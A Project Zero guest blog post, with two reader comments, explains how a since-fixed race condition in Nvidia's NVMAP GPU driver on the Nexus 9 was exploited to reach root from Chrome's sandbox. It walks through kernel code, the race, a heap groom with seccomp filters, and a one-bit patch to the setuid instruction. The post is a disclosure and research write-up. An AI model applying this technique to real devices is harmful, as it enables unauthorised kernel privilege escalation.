Posted by Lee Campbell, Graphics Pwning Unit
[This guest post continues Project Zero’s practice of promoting excellence in security research on the Project Zero blog]
Background:
- Chrome for Android implements a very different sandbox model to that of Chrome for Linux. One of the platform features we make use of is enabled with the android:isolatedProcess attribute on the <service> tag in the app manifest. The docs say:
android:isolatedProcess
If set to true, this service will run under a special process that is isolated from the rest of the system and has no permissions of its own. The only communication with it is through the Service API (binding and starting).
- Under the covers this places the specified Android Service into a more restrictive SELinux policy and is what Chrome uses for its renderer processes. All is good so far.
- Back in September I decided to take a look at how ‘isolated’ this isolatedProcess actually is, and specifically look at the kernel attack surface.
- As it turns out access to the GPU drivers is not blocked and this blog is the story of exploiting Nvidia’s NVMAP driver on the Nexus 9...
What is the NVMAP driver?
- It’s used for GPU memory management on Nvidia’s Tegra chipsets. It’s used in many Android devices and more recently Chromebooks.
- Nvidia were very responsive and released an upstream fix within a matter of days—they have recently released their bulletin CVE-2014-5332.
Some internals:
- The entry point is /dev/nvmap with rw-rw-rw- permissions making it accessible by all.
- There are a number of IOCTLs used to control this driver and they’ll be our focus for exploitation.
NVMAP_IOC_CREATE:
- This ioctl is used to create handles and returns a file descriptor.
- Handles are allocated globally and stored in struct nvmap_handle.
struct nvmap_handle {
struct rb_node node; /* entry on global handle tree */
atomic_t ref; /* reference count (i.e., # of duplications) */
atomic_t pin; /* pin count */
u32 flags; /* caching flags */
...
- Local client references are maintained by this struct:
struct nvmap_handle_ref {
struct nvmap_handle *handle;
struct rb_node node;
atomic_t dupes; /* number of times to free on file close */
atomic_t pin; /* number of times to unpin on free */
};
- The following code is used to create this structure and allocate the file descriptor.
int nvmap_ioctl_create(struct file *filp, unsigned int cmd, void __user *arg)
{
struct nvmap_create_handle op;
struct nvmap_handle_ref *ref = NULL;
struct nvmap_client *client = filp->private_data;
int err = 0;
int fd = 0;
if (copy_from_user(&op, arg, sizeof(op)))
return -EFAULT;
if (!client)
return -ENODEV;
if (cmd == NVMAP_IOC_CREATE) {
ref = nvmap_create_handle(client, PAGE_ALIGN(op.size));
if (!IS_ERR(ref))
ref->handle->orig_size = op.size;
} else if (cmd == NVMAP_IOC_FROM_ID) {
ref = nvmap_duplicate_handle(client, unmarshal_id(op.id), 0);
} else if (cmd == NVMAP_IOC_FROM_FD) {
ref = nvmap_create_handle_from_fd(client, op.fd);
} else {
return -EINVAL;
}
if (IS_ERR(ref))
return PTR_ERR(ref);
fd = nvmap_create_fd(client, ref->handle);
if (fd < 0)
err = fd;
//POINT A
op.handle = fd;
if (copy_to_user(arg, &op, sizeof(op))) { //POINT B
err = -EFAULT;
nvmap_free_handle(client, __nvmap_ref_to_id(ref));
}
if (err && fd > 0)
sys_close(fd);
return err;
}
- On successful completion the handle->ref count is 2: one reference held by our client, and one reference held by the DMA subsystem that provided the file descriptor in nvmap_create_fd. This call always returns fd’s starting at 1024, so we can predict them.
- When the fd returned by the ioctl is closed by user-space the DMA subsystem releases its reference. When the fd to /dev/nvmap is closed the client releases its reference. Once the reference count equals zero the handle structure is free’ed.
The bug:
- If the copy_to_user at point B were to fail then nvmap_free_handle will destroy the client reference and the handle->ref count will drop to 1.
- sys_close will then be called on the fd and this will release the DMA reference, reducing the handle->ref count to 0 and freeing it.
- This is the correct operation and no resources are leaked.
- However, the copy_to_user can be forced to fail by providing a userspace address in Read-Only memory, so the client reference will always be free’ed.
- Unfortunately a race condition exists at point A where a second user thread can dup(1024) and acquire another handle to the DMA subsystem. Recall fd’s are allocated predictably starting at 1024. This is an easy race to win!
- The function will continue to call sys_close and return failure. sys_close in this case will not release the DMA reference as user-space now has another handle.
Ok that’s great, what now?
- When operating correctly, two references are held to the handle. Due to triggering the race above, there is now only one.
- This is a nice state for an attacker as userspace now has a reference to a handle that it can free asynchronously at any time, e.g., during another ioctl call.
- To trigger the free’ing of the handle struct, userspace can call close() on the dup’ed fd.
So now we can free on demand, can we break stuff?
- This is tricky, we need to win more races. ;-)
- The ioctl calls take the fd as a reference to the handle. In this case the dup’ed fd can be used to perform operations on the handle in the kernel.
- Here is an example ioctl:
int nvmap_ioctl_getid(struct file *filp, void __user *arg)
{
struct nvmap_create_handle op;
struct nvmap_handle *h = NULL;
if (copy_from_user(&op, arg, sizeof(op)))
return -EFAULT;
h = unmarshal_user_handle(op.handle); //POINT C
if (!h)
return -EINVAL;
h = nvmap_handle_get(h); //POINT D
if (!h)
return -EPERM;
op.id = marshal_id(h);
nvmap_handle_put(h); //POINT E
return copy_to_user(arg, &op, sizeof(op)) ? -EFAULT : 0;
}
- Most ioctl’s follow this pattern:
- unmarshal_user_handle - to convert the fd to the address of the handle
- nvmap_handle_get - this grabs a reference, incrementing handle->ref
- Do some work
- nvmap_handle_put - this drops the reference, decrementing handle->ref
- Although userspace can now asynchronously (in another thread) decrement the handle->ref count and cause a free by calling close there is only a small window to do this.
- At point C the handle must be valid and close can not be called before this point (or NULL will be returned)
- At point D another reference is taken on the handle and calling close will not decrement the count to zero, so handle will not be free’ed until point E.
- So the only place corruption can occur is if userspace frees the handle between points C and D. This race is much more tricky to win as very little happens between these two points.
- Its made harder as to advance this exploit an attacker not only needs to free the handle but also needs to allocate something controllable in its space. As a result most of the ioctls do not provide enough time between unmarshal_user_handle and nvmap_handle_get to set up an exploitable condition.
NVMAP_IOC_RESERVE to the rescue:
- There is only one viable ioctl where I could generate enough time to create an exploitable condition. The IOC_RESERVE ioctl can be seen here (lots of checks removed for clarity):
int nvmap_ioctl_cache_maint_list(struct file *filp, void __user *arg,
bool is_reserve_ioctl)
{
struct nvmap_cache_op_list op;
u32 *handle_ptr;
u32 *offset_ptr;
u32 *size_ptr;
struct nvmap_handle **refs;
int i, err = 0;
if (copy_from_user(&op, arg, sizeof(op)))
return -EFAULT;
refs = kcalloc(op.nr, sizeof(*refs), GFP_KERNEL);
if (!refs)
return -ENOMEM;
handle_ptr = (u32 *)(uintptr_t)op.handles;
offset_ptr = (u32 *)(uintptr_t)op.offsets;
size_ptr = (u32 *)(uintptr_t)op.sizes;
for (i = 0; i < op.nr; i++) {
u32 handle;
if (copy_from_user(&handle, &handle_ptr[i], sizeof(handle))) {
err = -EFAULT;
goto free_mem;
}
refs[i] = unmarshal_user_handle(handle); //POINT F
if (!refs[i]) {
err = -EINVAL;
goto free_mem;
}
}
if (is_reserve_ioctl) //POINT G
err = nvmap_reserve_pages(refs, offset_ptr, size_ptr,
op.nr, op.op);
free_mem:
kfree(refs);
return err;
}
- In this ioctl unmarshal_user_handle is in a loop (point F), which must be completed before the handles are used at point G.
- The iteration count, and therefore the time spent in the loop, is user-controlled. This can be made fairly large (around 4k) to provide enough time to set up the attack.
- ref[0] is set to the dup’ed fd. The rest of the refs[] are set to point another fully valid fd (created without the dup race). They can all be the same.
- While the loop spins ref[0] can be free’ed in another thread at point G. Now we have a stale pointer that is about to be used!
- nvmap_reserve_pages is then called and is shown here:
int nvmap_reserve_pages(struct nvmap_handle **handles, u32 *offsets, u32 *sizes,
u32 nr, u32 op)
{
int i;
for (i = 0; i < nr; i++) {
u32 size = sizes[i] ? sizes[i] : handles[i]->size;
u32 offset = sizes[i] ? offsets[i] : 0;
if (op == NVMAP_PAGES_RESERVE)
nvmap_handle_mkreserved(handles[i], offset, size);
else
nvmap_handle_mkunreserved(handles[i],offset, size);
}
if (op == NVMAP_PAGES_RESERVE)
nvmap_zap_handles(handles, offsets, sizes, nr);
return 0;
}
- By setting op != NVMAP_PAGES_RESERVE nvmap_handle_mkunreserved is called on each handle. This is a NoOp for all handles except handle[0] which has been free’ed.
- nvmap_handle_mkunreserved is shown here along with its helper functions:
static inline void nvmap_handle_mkunreserved(struct nvmap_handle *h,
u32 offset, u32 size)
{
nvmap_handle_mk(h, offset, size, nvmap_page_mkunreserved);
}
static inline void nvmap_page_mkunreserved(struct page **page)
{
*page = (struct page *)((unsigned long)*page & ~2UL);
}
static inline void nvmap_handle_mk(struct nvmap_handle *h,
u32 offset, u32 size,
void (*fn)(struct page **))
{
int i;
int start_page = PAGE_ALIGN(offset) >> PAGE_SHIFT;
int end_page = (offset + size) >> PAGE_SHIFT;
if (h->heap_pgalloc) {
for (i = start_page; i < end_page; i++)
fn(&h->pgalloc.pages[i]);
}
}
- This code uses the pointer h->pgalloc.pages stored in the handle struct. This points to an array of pointers. This array is iterated through and bit two of each pointer is cleared.
- start_page and end_page are user controlled so the number of pages can be controlled and easily set to one.
- As the handle has been free’ed there is a momentary opportunity to allocate attacker controlled data in its place and control h->pgalloc.pages
- This would allow an attacker to clear bit 2 of any word in the system. A lot of work for a single bit clear but I’ll take it :)
Heap groom:
- The handle struct is 224 bytes and is allocated with kzalloc. This puts it in the 256-kmalloc heap.
- An attacker needs to find something that allocates quicky, is around 256 bytes long and has controllable content.
- Seccomp-bpf provides such a facility in the form of seccomp-bpf programs (or filters). I picked seccomp as I use it a lot, but there are many other things in the kernel you could pick.
- Allocating a filter (sized around 256 bytes) at point G will hopefully reallocate over the free’ed handle struct.
- The filter is invalid so it is immediately free’ed by seccomp-bpf but its contents will remain long enough for the attack to succeed.
- So now we control the pointer to a single bit clear!
What bit to clear?
- We now need to find a single bit in the kernel that will provide privilege escalation.
- Arm64 does not protect its kernel text sections and they are writable by the kernel itself. As such the kernel can modify its own code. So I looked for a nice instruction to modify.
- Here is a partial disassembly of setuid (Arm64 on the Nexus 9)
ffffffc0000c3bcc: 528000e0 mov w0, #0x7
ffffffc0000c3bd0: f9400821 ldr x1, [x1,#16]
ffffffc0000c3bd4: f9424034 ldr x20, [x1,#1152]
ffffffc0000c3bd8: 97ffcd8f bl ffffffc0000b7214 <nsown_capable>
ffffffc0000c3bdc: 53001c00 uxtb w0, w0 //Point H
ffffffc0000c3be0: 35000280 cbnz w0, ffffffc0000c3c30<SyS_setuid+0xa8>//POINT I
ffffffc0000c3be4: b9400680 ldr w0, [x20,#4]
ffffffc0000c3be8: 6b0002bf cmp w21, w0
ffffffc0000c3bd0: f9400821 ldr x1, [x1,#16]
ffffffc0000c3bd4: f9424034 ldr x20, [x1,#1152]
ffffffc0000c3bd8: 97ffcd8f bl ffffffc0000b7214 <nsown_capable>
ffffffc0000c3bdc: 53001c00 uxtb w0, w0 //Point H
ffffffc0000c3be0: 35000280 cbnz w0, ffffffc0000c3c30<SyS_setuid+0xa8>//POINT I
ffffffc0000c3be4: b9400680 ldr w0, [x20,#4]
ffffffc0000c3be8: 6b0002bf cmp w21, w0
and the C version:
SYSCALL_DEFINE1(setuid, uid_t, uid)
{
// [.....]
retval = -EPERM;
if (nsown_capable(CAP_SETUID)) { //POINT J
new->suid = new->uid = kuid;
if (!uid_eq(kuid, old->uid)) {
retval = set_user(new);
if (retval < 0)
goto error;
}
} else if (!uid_eq(kuid, old->uid) && !uid_eq(kuid, new->suid)) {
goto error;
}
// [....]
return commit_creds(new);
error:
abort_creds(new);
return retval;
}
- If we can make the condition at point J return non-zero then it would be as if the processes has CAP_SETUID and the attacker could call setuid(0) and elevate to root.
- The asm code at point H is where this condition is evaluated.
- uxtb w0,w0 just extends the byte value in w0 to a full word and stores it back in w0
- At point I the branch is taken if w0 is non-zero, this is the branch the attacker would like to take to gain privilege.
- The byte code for uxtb w0,w0 is 0x53001c00. Using the clear bit primitive from above we can change this word to 0x51001c00.
- This results in the new instruction sub w0,w0,#7.
- Now w0 will contain the non-zero value -7 and it will appear as if CAP_SETGID is set.
- Now we just call setuid(0) and we are root.
- Easy as that!
Winning the race:
- There are a number of races in this attack and the probability of success (i.e., them all landing perfectly) is quite low. That said, a lose is non-fatal (for the most part) so an attacker can just keep trying until setuid(0) returns success.
- On a real system this attack takes many thousands of attempts but usually gains root in less than 10 seconds.
Great work, thank you for making the IT world a safer place!
ReplyDeleteFascinating, thank you for the clear explanation.
ReplyDeleteIf the kernel code were write-protected, would the single-bit-clear still allow a root exploit?